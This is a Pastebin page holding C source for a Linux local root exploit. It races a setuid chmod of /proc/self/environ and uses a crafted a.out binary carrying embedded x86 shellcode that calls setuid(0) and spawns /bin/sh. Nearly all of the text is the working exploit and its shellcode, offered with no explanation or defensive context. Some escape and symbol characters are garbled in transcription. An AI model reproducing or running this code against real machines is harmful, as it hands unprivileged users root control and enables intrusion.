Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #include <stdio.h>
- #include <stdlib.h>
- #include <string.h>
- #include <unistd.h>
- #include <fcntl.h>
- #include <errno.h>
- #include <sched.h>
- #include <sys/types.h>
- #include <sys/stat.h>
- #include <sys/prctl.h>
- #include <sys/mman.h>
- #include <sys/wait.h>
- #include <linux/a.out.h>
- #include <asm/unistd.h>
- static struct exec ex;
- static char *e[256];
- static char *a[4];
- static char b[512];
- static char t[256];
- static volatile int *c;
- /* shell code */
- __asm__ (" __excode: call 1f n"
- " 1: mov $23, %eax n"
- " xor %ebx, %ebx n"
- " int $0×80 n"
- " pop %eax n"
- " mov $cmd-1b, %ebx n"
- " add %eax, %ebx n"
- " mov $arg-1b, %ecx n"
- " add %eax, %ecx n"
- " mov %ebx, (%ecx) n"
- " mov %ecx, %edx n"
- " add $4, %edx n"
- " mov $11, %eax n"
- " int $0×80 n"
- " mov $1, %eax n"
- " int $0×80 n"
- " arg: .quad 0×00, 0×00 n"
- " cmd: .string "/bin/sh" n"
- " __excode_e: nop n"
- " .global __excode n"
- " .global __excode_e n"
- );
- extern void (*__excode) (void);
- extern void (*__excode_e) (void);
- void
- error (char *err)
- {
- perror (err);
- fflush (stderr);
- exit (1);
- }
- /* exploit this shit */
- void
- exploit (char *file)
- {
- int i, fd;
- void *p;
- struct stat st;
- printf ("ntrying to exploit %snn", file);
- fflush (stdout);
- chmod ("/proc/self/environ", 04755);
- c = mmap (0, 4096, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, 0, 0);
- memset ((void *) c, 0, 4096);
- /* slow down machine */
- fd = open (file, O_RDONLY);
- fstat (fd, &st);
- p =
- (void *) mmap (0, st.st_size, PROT_READ | PROT_WRITE, MAP_PRIVATE, fd, 0);
- if (p == MAP_FAILED)
- error ("mmap");
- prctl (PR_SET_DUMPABLE, 0, 0, 0, 0);
- sprintf (t, "/proc/%d/environ", getpid ());
- sched_yield ();
- execve (NULL, a, e);
- madvise (0, 0, MADV_WILLNEED);
- i = fork ();
- /* give it a try */
- if (i)
- {
- (*c)++;
- !madvise (p, st.st_size, MADV_WILLNEED) ? : error ("madvise");
- prctl (PR_SET_DUMPABLE, 1, 0, 0, 0);
- sched_yield ();
- }
- else
- {
- nice(10);
- while (!(*c));
- sched_yield ();
- execve (t, a, e);
- error ("failed");
- }
- waitpid (i, NULL, 0);
- exit (0);
- }
- int
- main (int ac, char **av)
- {
- int i, j, k, s;
- char *p;
- memset (e, 0, sizeof (e));
- memset (a, 0, sizeof (a));
- a[0] = strdup (av[0]);
- a[1] = strdup (av[0]);
- a[2] = strdup (av[1]);
- if (ac < 2)
- error ("usage: binary <big file name>");
- if (ac > 2)
- exploit (av[2]);
- printf ("npreparing");
- fflush (stdout);
- /* make setuid a.out */
- memset (&ex, 0, sizeof (ex));
- N_SET_MAGIC (ex, NMAGIC);
- N_SET_MACHTYPE (ex, M_386);
- s = ((unsigned) &__excode_e) – (unsigned) &__excode;
- ex.a_text = s;
- ex.a_syms = -(s + sizeof (ex));
- memset (b, 0, sizeof (b));
- memcpy (b, &ex, sizeof (ex));
- memcpy (b + sizeof (ex), &__excode, s);
- /* make environment */
- p = b;
- s += sizeof (ex);
- j = 0;
- for (i = k = 0; i < s; i++)
- {
- if (!p[i])
- {
- e[j++] = &p[k];
- k = i + 1;
- }
- }
- /* reexec */
- getcwd (t, sizeof (t));
- strcat (t, "/");
- strcat (t, av[0]);
- execve (t, a, e);
- error ("execve");
- return 0;
- }
Add Comment
Please, Sign In to add comment